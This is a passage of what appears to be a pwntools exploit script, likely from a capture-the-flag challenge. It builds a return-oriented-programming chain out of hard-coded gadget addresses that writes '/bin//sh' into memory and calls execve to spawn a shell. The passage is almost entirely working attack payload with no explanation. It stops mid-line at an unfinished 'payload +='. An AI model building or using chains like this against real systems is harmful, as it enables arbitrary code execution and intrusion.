payload = p64(0x4017d3)
#0x00000000004017d3: pop rdi; ret; 
payload += p64(0x476070)+p64(0x44eaed)
# 0x000000000044eaed: pop rcx; ret; 
payload += p64(0x6e69622f)+p64(0x434b96)
# 0x0000000000434b96: xchg ecx, eax; ret; 
payload += p64(0x45a694)
# 0x000000000045a694: stosd dword ptr [rdi], eax; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x476074)+p64(0x44eaed)
# 0x000000000044eaed: pop rcx; ret; 
payload += p64(0x68662f)+p64(0x434b96)
# 0x0000000000434b96: xchg ecx, eax; ret; 
payload += p64(0x45a694)
# 0x000000000045a694: stosd dword ptr [rdi], eax; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x476070)+p64(0x44eaed)
# 0x000000000044eaed: pop rcx; ret; 
payload += p64(0x0)+p64(0x434b96)
# 0x0000000000434b96: xchg ecx, eax; ret; 
payload += p64(0x46cd46)
# 0x46cd46: cdq ; retf
payload += p32(0x44eaed)+p32(0x33)
# 0x000000000044eaed: pop rcx; ret; 
payload += p64(0x3b)+p64(0x434b96)
# 0x0000000000434b96: xchg ecx, eax; ret; 
payload += p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x4349cb)
# 0x00000000004349cb: syscall; ret; 
payload +=
